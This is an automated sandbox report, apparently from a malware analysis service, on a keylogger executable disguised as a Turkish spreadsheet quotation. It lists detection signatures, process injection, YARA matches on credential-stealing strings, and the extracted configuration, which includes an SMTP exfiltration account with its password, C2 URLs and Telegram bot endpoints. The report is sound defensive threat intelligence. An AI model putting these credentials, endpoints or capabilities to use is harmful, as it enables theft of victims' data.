Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:	1574855
MD5:	037b9dc9d5bee07e111173cbe87624b4
SHA1:	881d8ba41c222c0ff9ee96dab3e954417da6c34f
SHA256:	3f9ac29a06c3a7145971c352ecc386b94dc13be8b479d09c920f36e20f6b1b41
Tags:	exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected UAC Bypass using CMSTP

Yara detected VIP Keylogger

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: 037B9DC9D5BEE07E111173CBE87624B4)

conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 4200 cmdline: C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x737a8:$a1: get_encryptedPassword 0xb67f0:$a1: get_encryptedPassword 0x73d30:$a2: get_encryptedUsername 0xb6d78:$a2: get_encryptedUsername 0x7341b:$a3: get_timePasswordChanged 0xb6463:$a3: get_timePasswordChanged 0x73532:$a4: get_passwordField 0xb657a:$a4: get_passwordField 0x737be:$a5: set_encryptedPassword 0xb6806:$a5: set_encryptedPassword 0x764da:$a6: get_passwords 0xb9522:$a6: get_passwords 0x7686e:$a7: get_logins 0xb98b6:$a7: get_logins 0x764c6:$a8: GetOutlookPasswords 0xb950e:$a8: GetOutlookPasswords 0x75e7f:$a9: StartKeylogger 0xb8ec7:$a9: StartKeylogger 0x767c7:$a10: KeyLoggerEventArgs 0xb980f:$a10: KeyLoggerEventArgs 0x75f1f:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4019025145.0000000003139000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16880:$a1: get_encryptedPassword 0x16dfe:$a2: get_encryptedUsername 0x16502:$a3: get_timePasswordChanged 0x16619:$a4: get_passwordField 0x16896:$a5: set_encryptedPassword 0x1955a:$a6: get_passwords 0x198ea:$a7: get_logins 0x19546:$a8: GetOutlookPasswords 0x18eff:$a9: StartKeylogger 0x19843:$a10: KeyLoggerEventArgs 0x18f9f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegAsm.exe PID: 3344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3344	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegAsm.exe PID: 3344	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3344	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdaa62:$a1: get_encryptedPassword 0xdafe0:$a2: get_encryptedUsername 0xda6e4:$a3: get_timePasswordChanged 0xda7fb:$a4: get_passwordField 0xdaa78:$a5: set_encryptedPassword 0xdd73c:$a6: get_passwords 0xddacc:$a7: get_logins 0xdd728:$a8: GetOutlookPasswords 0xdd0e1:$a9: StartKeylogger 0xdda25:$a10: KeyLoggerEventArgs 0xdd181:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
3.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
3.2.RegAsm.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
3.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ce8:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71270:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x7095b:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a72:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cfe:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x73a1a:$a6: get_passwords 0x30d66:$a7: get_logins 0x73dae:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x73a06:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x733bf:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73d07:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x720ac:$s1: UnHook 0x2f06b:$s2: SetHook 0x720b3:$s2: SetHook 0x2f073:$s3: CallNextHook 0x720bb:$s3: CallNextHook 0x2f080:$s4: _hook 0x720c8:$s4: _hook
Click to see the 26 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:47:34.911215+0100	2803305	3	Unknown Traffic	192.168.2.8	49709	104.21.67.152	443	TCP
2024-12-13T17:47:38.152950+0100	2803305	3	Unknown Traffic	192.168.2.8	49713	104.21.67.152	443	TCP
2024-12-13T17:47:41.414563+0100	2803305	3	Unknown Traffic	192.168.2.8	49717	104.21.67.152	443	TCP
2024-12-13T17:47:44.687718+0100	2803305	3	Unknown Traffic	192.168.2.8	49719	104.21.67.152	443	TCP
2024-12-13T17:47:57.776310+0100	2803305	3	Unknown Traffic	192.168.2.8	49727	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:47:30.501678+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	132.226.8.169	80	TCP
2024-12-13T17:47:33.251737+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	132.226.8.169	80	TCP
2024-12-13T17:47:36.517401+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	132.226.8.169	80	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 13 Dec 2024 16:47:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20a
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.4019025145.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegAsm.exe, 00000003.00000002.4019025145.00000000031EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
